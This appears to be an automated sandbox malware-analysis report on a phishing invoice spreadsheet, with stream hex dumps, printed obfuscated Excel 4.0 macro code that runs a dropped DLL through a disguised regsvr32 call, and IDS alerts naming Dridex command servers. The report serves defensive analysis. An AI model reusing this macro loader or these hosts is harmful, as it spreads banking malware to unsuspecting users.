                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . * . W o r l d _ t i m e _ P r i n t , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 1e 01 00 00 d0 03 00 00 02 01 00 00 2e 02 00 00 ff ff ff ff d7 03 00 00 b3 04 00 00 00 00 00 00 01 00 00 00 23 f3 00 d5 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                Index
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_Exposed
                                                                                                Long)
                                                                                                VB_Customizable
                                                                                                Print_Sheet_MAin
                                                                                                World_time_Print_Layout(ByVal
                                                                                                VB_Control
                                                                                                "World_time_Print,
                                                                                                MultiPage"
                                                                                                Sheet_Print()
                                                                                                VB_TemplateDerived
                                                                                                MSForms,
                                                                                                False
                                                                                                Attribute
                                                                                                Private
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VBA Code
                                                                                                VBA File Name: Sheet2.cls, Stream Size: 991
                                                                                                General
                                                                                                 Stream Path: VBA/Sheet2
                                                                                                 VBA File Name: Sheet2.cls
                                                                                                 Stream Size: 991
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . ^ . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 9d 5e 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code
                                                                                                VBA File Name: Sheet3.cls, Stream Size: 991
                                                                                                General
                                                                                                Stream Path:VBA/Sheet3
                                                                                                VBA File Name:Sheet3.cls
                                                                                                Stream Size:991
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . } . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 7d 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code
                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                General
                                                                                                Stream Path:VBA/ThisWorkbook
                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                Stream Size:999
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . # . . r . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 23 f3 c9 72 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                VBA Code Keywords

                                                                                                Keyword
                                                                                                False
                                                                                                VB_Exposed
                                                                                                Attribute
                                                                                                VB_Name
                                                                                                VB_Creatable
                                                                                                "ThisWorkbook"
                                                                                                VB_PredeclaredId
                                                                                                VB_GlobalNameSpace
                                                                                                VB_Base
                                                                                                VB_Customizable
                                                                                                VB_TemplateDerived
                                                                                                VBA Code

                                                                                                Streams

                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 664
                                                                                                General
                                                                                                Stream Path:PROJECT
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Stream Size:664
                                                                                                Entropy:5.2164189289
                                                                                                Base64 Encoded:True
                                                                                                Data ASCII:I D = " { 3 8 C 1 2 A 0 A - E 6 4 8 - 4 6 4 5 - A 7 B 8 - E 4 4 A B D C 4 2 5 E 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D
                                                                                                Data Raw:49 44 3d 22 7b 33 38 43 31 32 41 30 41 2d 45 36 34 38 2d 34 36 34 35 2d 41 37 42 38 2d 45 34 34 41 42 44 43 34 32 35 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 128
                                                                                                General
                                                                                                Stream Path:PROJECTwm
                                                                                                File Type:data
                                                                                                Stream Size:128
                                                                                                Entropy:3.22588715598
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4043
                                                                                                General
                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                File Type:data
                                                                                                Stream Size:4043
                                                                                                Entropy:4.60204133276
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2485
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_0
                                                                                                File Type:data
                                                                                                Stream Size:2485
                                                                                                Entropy:3.44397799521
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . y . . . . . ` L . o . . * . % .
                                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 337
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_1
                                                                                                File Type:data
                                                                                                Stream Size:337
                                                                                                Entropy:2.58977777762
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p C a l l e r . . . . . . . . . . . . . . . . s z U R L . . . . . . . . . . . . . . . . s z F i l e N a m e . . . . . . . . . . . . . . . . d w R e s e r v e d . . . . . . . . . . . . . . . . l p f n C B . . . . . . . .
                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff
                                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 505
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_2
                                                                                                File Type:data
                                                                                                Stream Size:505
                                                                                                Entropy:2.40466111917
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . $ . . . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . .
                                                                                                Data Raw:72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 682
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_3
                                                                                                File Type:data
                                                                                                Stream Size:682
                                                                                                Entropy:2.22119402301
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . .
                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 68 00 e1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                Stream Path: VBA/dir, File Type: SVR2 pure executable (USS/370) not stripped - version 8520192, Stream Size: 860
                                                                                                General
                                                                                                Stream Path:VBA/dir
                                                                                                File Type:SVR2 pure executable (USS/370) not stripped - version 8520192
                                                                                                Stream Size:860
                                                                                                Entropy:6.57150861586
                                                                                                Base64 Encoded:True
                                                                                                Data ASCII:. X . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                Data Raw:01 58 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 bc f8 61 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                Macro 4.0 Code

                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)
                                                                                                
                                                                                                ,"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",uveoybvk.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                                OLE File "/opt/package/joesandbox/database/analysis/342716/sample/1_Total New Invoices-Thursday January 21_2021.xlsm"

                                                                                                Indicators

                                                                                                Has Summary Info:False
                                                                                                Application Name:unknown
                                                                                                Encrypted Document:False
                                                                                                Contains Word Document Stream:
                                                                                                Contains Workbook/Book Stream:
                                                                                                Contains PowerPoint Document Stream:
                                                                                                Contains Visio Document Stream:
                                                                                                Contains ObjectPool Stream:
                                                                                                Flash Objects Count:
                                                                                                Contains VBA Macros:False

                                                                                                Summary

                                                                                                Subject:by C.H. Robinson
                                                                                                Author:
                                                                                                Last Saved By:
                                                                                                Create Time:2021-01-21T13:13:53Z
                                                                                                Last Saved Time:2021-01-21T13:20:42Z
                                                                                                Security:0

                                                                                                Document Summary

                                                                                                Thumbnail Scaling Desired:false
                                                                                                Company:
                                                                                                Contains Dirty Links:false
                                                                                                Shared Document:false
                                                                                                Changed Hyperlinks:false
                                                                                                Application Version:16.0300

                                                                                                Streams

                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                General
                                                                                                Stream Path:\x1CompObj
                                                                                                File Type:data
                                                                                                Stream Size:115
                                                                                                Entropy:4.80096587863
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: f, File Type: data, Stream Size: 178
                                                                                                General
                                                                                                Stream Path:f
                                                                                                File Type:data
                                                                                                Stream Size:178
Entropy: 2.99997300614
Base64 Encoded: False
Data ASCII: . . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . i . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 a b 4 5 . . . 5 . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 a b 4 5 . . . . . . . . . . . . . . . T . . .
Data Raw: 00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 d8 13 00 00 e2 0e 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 69 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 61 62 34 35 00 00 00 35 00 00 00 00 00

Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
Entropy: 4.63372611993
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/f, File Type: data, Stream Size: 40
Entropy: 1.90677964945
Base64 Encoded: False
Data ASCII: . . . . @ . . . . . . . . } . . n . . . x . . . . . . . . . . . . . . . . . . .
Data Raw: 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 78 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/o, File Type: empty, Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII:
Data Raw:

Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
Entropy: 4.63372611993
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/f, File Type: data, Stream Size: 40
Entropy: 1.90677964945
Base64 Encoded: False
Data ASCII: . . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/o, File Type: empty, Stream Size: 0
Entropy: 0.0
Base64 Encoded: False
Data ASCII:
Data Raw:

Stream Path: o, File Type: data, Stream Size: 152
Entropy: 3.07931127615
Base64 Encoded: False
Data ASCII: . . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . 9 . . . . P a g e 2 . . 9 . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw: 00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 d8 13 00 00 e2 0e 00 00 05 00 00 80 50 61 67 65 31 da 1c 39 05 00 00 80 50 61 67 65 32 da 1c 39 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: x, File Type: data, Stream Size: 48
Entropy: 1.42267983198
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

,"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",uveoybvk.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/21/21-16:03:27.533313 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
01/21/21-16:04:10.528618 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49170 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:12.499655 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49171 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:16.182279 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49173 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:16.182279 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49173 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:17.732097 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49174 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:19.577174 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49175 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:20.449372 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49176 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:22.405299 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49178 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:22.977932 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49179 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:22.977932 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49179 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:24.326739 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49181 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:25.673798 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49182 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:25.916031 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49183 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:25.916031 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49183 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:27.251133 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49185 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:28.586947 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49187 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:29.150739 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49188 | 198.57.200.100 | 192.168.2.22
